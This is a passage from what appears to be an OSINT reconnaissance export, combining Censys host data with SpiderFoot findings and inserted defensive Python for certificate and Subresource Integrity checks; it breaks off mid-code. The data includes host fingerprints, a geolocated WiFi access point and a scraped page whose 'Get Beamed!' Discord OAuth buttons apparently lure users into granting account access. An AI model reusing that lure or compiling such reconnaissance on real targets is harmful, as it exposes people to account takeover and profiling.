{"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": 
"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": 
["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" 
style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": 
"OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", 
"exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | ayu.xyz | ayhu.xyz |
| 2023-05-12 02:44:23 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4d:72:d7:7c:dd:a7:02:dd:5a:67:f2:a2:3b:bd:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1
Validity
Not Before: Feb 21 00:00:00 2023 GMT
Not After : Mar 20 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b8:b0:60:0e:1a:2f:f1:b1:86:4b:64:ec:11:9f:
a6:79:be:e8:87:f1:88:c5:b4:49:9b:10:bb:ca:af:
ea:af:be:54:0c:78:43:7f:ca:7b:4e:45:5b:0b:24:
29:f1:bb:23:fc:19:a4:c7:6c:70:49:76:53:d3:09:
23:65:b2:48:7b:b6:1c:aa:07:1a:e2:79:1a:f9:7a:
5e:e7:16:f8:a6:4a:d5:39:a3:e2:0d:f7:57:ef:ed:
f8:08:76:5b:52:da:8b:d0:e6:1e:6e:2f:f9:0f:99:
4b:6a:52:ca:34:e1:a4:c9:20:33:d3:97:e8:7a:77:
c5:03:10:26:41:82:61:47:a2:af:c4:56:3f:76:a2:
38:cb:b2:70:ae:72:7a:43:c1:7e:27:a3:5e:d6:e3:
f6:e7:a5:30:70:bd:2a:96:27:7a:7b:fb:40:d2:57:
77:af:23:12:27:42:3a:c6:0b:6a:8c:bd:ba:2d:ee:
3f:9f:15:ee:62:57:a4:a6:95:50:af:43:b0:ac:76:
b8:e1:0e:d9:ff:56:ec:74:50:86:b5:1f:96:2c:d1:
95:05:e5:b7:05:67:93:4e:9e:f2:5a:38:1f:a7:8f:
43:5a:de:3c:57:da:48:7a:50:c6:88:38:15:c8:97:
2c:2c:ec:f8:39:09:36:bd:19:8d:03:56:41:66:07:
24:e3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:B7:6B:A2:EA:A8:AA:84:8C:79:EA:B4:DA:0F:98:B2:C5:95:76:B9:F4
X509v3 Subject Key Identifier:
8D:02:1C:75:5A:CD:C6:A6:41:78:69:28:C3:F7:AA:A7:98:3B:D5:BB
X509v3 Subject Alternative Name:
DNS:*.github.io, DNS:github.io, DNS:*.github.com, DNS:github.com, DNS:www.github.com, DNS:*.githubusercontent.com, DNS:githubusercontent.com
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Feb 21 15:03:41.179 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:AA:7E:67:D2:3B:C3:31:79:E5:59:FD:
F2:73:AA:A0:41:A7:E5:6A:79:10:D4:39:40:55:1B:24:
D3:3A:7E:37:7B:02:21:00:94:F4:4B:6E:E6:98:65:25:
A6:A3:62:0C:00:CF:F8:9A:3C:0B:A9:18:1C:5F:BB:53:
A4:D8:EF:86:C7:5C:70:1A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 73:D9:9E:89:1B:4C:96:78:A0:20:7D:47:9D:E6:B2:C6:
1C:D0:51:5E:71:19:2A:8C:6B:80:10:7A:C1:77:72:B5
Timestamp : Feb 21 15:03:41.162 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:82:E0:7E:5D:05:40:34:18:F6:30:F7:
09:CD:BC:FE:2C:13:EB:90:30:CE:10:ED:E8:A7:9D:A3:
74:75:12:5B:72:02:20:5D:1F:9D:87:56:AA:F7:6D:9A:
04:0D:4A:7B:35:DE:90:29:A5:D4:16:A7:8F:DF:FE:37:
AB:35:8B:24:23:B9:2B
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Feb 21 15:03:41.130 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:13:FF:00:36:A8:61:87:48:A6:6A:04:09:
BC:E3:3E:AA:13:E7:46:3D:06:75:68:23:18:E7:6A:45:
49:F7:30:F1:02:20:3F:F4:9C:8A:E6:46:D3:65:F6:98:
13:BF:9A:20:D3:DA:10:A9:E3:2E:5D:DA:C7:3B:14:4E:
4F:4E:1C:82:A5:B3
Signature Algorithm: sha256WithRSAEncryption
37:a4:1b:11:22:9f:fc:9f:c9:67:07:8f:aa:86:13:9f:e0:08:
1d:6e:0c:8d:65:fb:03:79:50:c6:76:ba:30:90:a0:a4:1c:79:
13:07:b9:5a:18:8d:97:4c:05:71:8a:d0:22:17:c6:19:a2:22:
8b:03:f6:2c:84:71:6c:55:df:e2:99:43:65:e5:d7:b7:b7:37:
4c:c6:c8:e5:f1:d8:a7:7b:07:5d:eb:b8:1c:50:a4:a3:8e:f0:
4c:f8:b8:6a:72:59:be:43:0e:8a:de:b5:5e:8f:9e:3f:5a:43:
64:82:cc:e0:de:76:f4:be:a6:12:0a:06:68:bb:77:e1:4c:ef:
4b:4d:67:af:f6:72:c7:6b:1b:9c:48:53:a7:7f:ed:76:18:5c:
f0:f6:c6:4c:24:53:57:57:e1:42:a6:3d:ae:e1:f5:93:f2:6a:
fa:29:72:01:3e:b7:06:f1:2f:1a:0e:91:c5:ec:35:bf:f5:da:
33:95:de:24:12:0d:f5:c3:23:8d:40:82:d1:5c:eb:de:0a:08:
e8:e5:83:e5:0a:8b:3a:5e:98:4e:77:4f:9f:dc:ab:7e:ce:a8:
28:4f:aa:79:4f:c9:be:8f:60:88:6e:6b:f9:20:6c:7f:38:96:
d6:da:d7:11:03:43:d8:b8:51:87:ce:32:22:4d:64:4c:c4:75:
27:d0:e3:df
| 185.199.109.153 |
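The certificate above, presented by 185.199.109.153, is GitHub's wildcard certificate: its SAN list covers *.github.io, github.io and GitHub's other names, not whatever domain the scan followed to this IP. That is expected when a scanner connects by IP without SNI (it gets the host's default certificate) and says only that the address is a GitHub Pages edge; whether the site's own name is served with a valid certificate needs a connection with SNI set. As an added example that is not part of the SpiderFoot export, the Python below parses the `openssl x509 -text` fields shown above (validity, subject CN, SAN), applies the RFC 6125 wildcard rule browsers use, and checks validity at the export's scan date. The certificate excerpt is copied from the page; the host names tested at the bottom are this example's own.

```python
import re
from datetime import datetime, timezone

# Excerpt of the openssl -text dump above (Validity, Subject, SAN), copied
# from the page; everything else in the dump is irrelevant to name matching.
CERT_TEXT = """\
        Validity
            Not Before: Feb 21 00:00:00 2023 GMT
            Not After : Mar 20 23:59:59 2024 GMT
        Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io
            X509v3 Subject Alternative Name:
                DNS:*.github.io, DNS:github.io, DNS:*.github.com, DNS:github.com, DNS:www.github.com, DNS:*.githubusercontent.com, DNS:githubusercontent.com
"""

# Date of the export rows above (2023-05-12); the point in time we validate at.
SCAN_TIME = datetime(2023, 5, 12, tzinfo=timezone.utc)


def _openssl_time(value: str) -> datetime:
    """Parse 'Mar 20 23:59:59 2024 GMT'; openssl space-pads single-digit days."""
    cleaned = " ".join(value.split())
    return datetime.strptime(cleaned, "%b %d %H:%M:%S %Y GMT").replace(tzinfo=timezone.utc)


def parse_san(line: str) -> list[str]:
    """DNS names from an openssl-style 'DNS:a, DNS:b' line, lower-cased."""
    return [n.lower() for n in re.findall(r"DNS:([^,\s]+)", line)]


def parse_x509_text(text: str) -> dict:
    """Pull validity, subject CN and SAN names out of `openssl x509 -text` output."""
    info = {"san": [], "subject_cn": None}
    lines = text.splitlines()
    for i, raw in enumerate(lines):
        line = raw.strip()
        if line.startswith("Not Before:"):
            info["not_before"] = _openssl_time(line.split(":", 1)[1])
        elif line.startswith("Not After :"):
            info["not_after"] = _openssl_time(line.split(":", 1)[1])
        elif line.startswith("Subject:"):
            m = re.search(r"CN=([^,]+)", line)
            info["subject_cn"] = m.group(1).strip() if m else None
        elif line.startswith("X509v3 Subject Alternative Name") and i + 1 < len(lines):
            info["san"] = parse_san(lines[i + 1])  # names are on the following line
    return info


def name_matches(pattern: str, host: str) -> bool:
    """RFC 6125 6.4.3 wildcard rule as browsers apply it: '*' may only be the
    whole leftmost label and matches exactly one label, so *.github.io covers
    foo.github.io but neither github.io nor a.b.github.io."""
    host = host.rstrip(".").lower()
    pattern = pattern.rstrip(".").lower()
    if not pattern.startswith("*."):
        return host == pattern
    want = pattern.split(".")[1:]
    have = host.split(".")
    return len(have) == len(want) + 1 and have[1:] == want


def cert_covers(info: dict, host: str) -> bool:
    """Once a dNSName SAN is present the CN is not consulted (RFC 6125 6.4.4)."""
    return any(name_matches(n, host) for n in info["san"])


def valid_at(info: dict, when: datetime = SCAN_TIME) -> bool:
    return info["not_before"] <= when <= info["not_after"]


if __name__ == "__main__":
    cert = parse_x509_text(CERT_TEXT)
    print("subject CN:", cert["subject_cn"], "| valid at scan time:", valid_at(cert))
    # Hypothetical host names chosen to exercise each branch of the rule.
    for host in ("foo.github.io", "github.io", "a.b.github.io", "example.xyz"):
        print(f"{host:16} covered: {cert_covers(cert, host)}")
```

Because wildcard matching is one label deep, a name such as a.b.github.io is not covered by *.github.io even though it sits under that zone; a SAN mismatch against the scanned domain is therefore not by itself a finding against the site, only a reason to repeat the TLS check with SNI.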
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Wireless (Net ID: 00:09:5B:34:6B:03) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:54:44 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29418, United States, North America | 35.229.48.116 |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | http://code.jquery.com/jquery-3.2.1.js | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
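The "Externally Hosted Javascript" finding above flags jQuery loaded from http://code.jquery.com; reading the same head, the Font Awesome loader at https://use.fontawesome.com carries no integrity attribute at all, while the two Bootstrap resources have both integrity and crossorigin set. As an added example that is not the gallery page's own code, the Python below parses the script and stylesheet tags, reports third-party resources that are fetched over plain http, lack Subresource Integrity, or carry an integrity value without the crossorigin attribute the browser needs to verify it, and computes the value to put in integrity="..." for a known-good copy. The head excerpt is copied from the page; the policy and reason codes are this example's own.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed excerpt of the gallery page's <head> shown above; only the tags
# this check looks at are kept.
PAGE_HEAD = """<head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
</head>"""

# Reason codes returned by the audit and what each means to a reviewer.
REASONS = {
    "plain-http": "fetched over http: modifiable in transit, and blocked as mixed "
                  "content once the page itself is served over https",
    "missing-sri": "no integrity attribute: whatever the CDN serves runs with the "
                   "page's privileges",
    "sri-without-crossorigin": "integrity on a cross-origin resource fetched without "
                               "CORS: the browser cannot check the hash and refuses it",
}


class SubresourceParser(HTMLParser):
    """Collect <script src> and <link rel=stylesheet href> with their SRI attributes."""

    def __init__(self):
        super().__init__()
        self.resources = []  # (url, integrity, crossorigin)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        url = None
        if tag == "script":
            url = a.get("src")
        elif tag == "link" and "stylesheet" in (a.get("rel") or "").split():
            url = a.get("href")
        if url:
            self.resources.append((url, a.get("integrity"), a.get("crossorigin")))


def audit_subresources(html: str) -> list[tuple[str, str]]:
    """Return (url, reason-code) for each third-party resource failing the policy."""
    parser = SubresourceParser()
    parser.feed(html)
    findings = []
    for url, integrity, crossorigin in parser.resources:
        parts = urlparse(url)
        if not parts.netloc:
            continue  # same-origin path such as gallery.css: SRI targets third-party hosts
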